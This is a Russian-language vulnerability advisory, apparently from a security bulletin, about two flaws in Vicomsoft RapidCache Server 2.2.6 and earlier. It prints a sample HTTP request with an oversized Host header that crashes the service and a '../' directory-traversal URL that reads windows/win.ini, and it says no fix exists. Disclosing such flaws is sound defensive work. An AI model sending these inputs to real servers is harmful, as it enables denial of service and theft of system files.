Дата публикации: | 20.01.2004 |
Всего просмотров: | 1143 |
Опасность: | Низкая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Локальная сеть |
Воздействие: |
Отказ в обслуживании Раскрытие важных данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | Vicomsoft RapidCache Server 2.x |
Уязвимые версии: RapidCache 2.2.6 и более ранние версии
Описание: Две уязвимости обнаружены в RapidCache. Удаленный пользователь аварийно завершить работу службы. Удаленный пользователь может также просматривать файлы на системе. Удаленный пользователь может послать HTTP GET запрос с длинным параметром 'Host', чтобы аварийно завершить работу RapidCache сервера. Пример: GET / HTTP/1.1 Accept: */*..Accept-Language: en-gb Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 Host: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb bbbbbbbbbbbbbbbc cccccccccccccccccccccccccccccccccccccccccccccccccccccccccc cccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddd dddddddddddddddddddddeeeeeeeeeeeeBBBBXXX X:8080 Connection: Keep-AliveТакже сообщается, что удаленный пользователь может представить специально обработанный URL, содержащий '../', чтобы просмотреть произвольные файлы на системе. Пример: http://127.0.0.1:8080/../../../../../../../../windows/win.ini URL производителя: http://www.vicomsoft.com/rapidcache/rapidcache.main.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | RapidCache Multiple Vulnerabilities |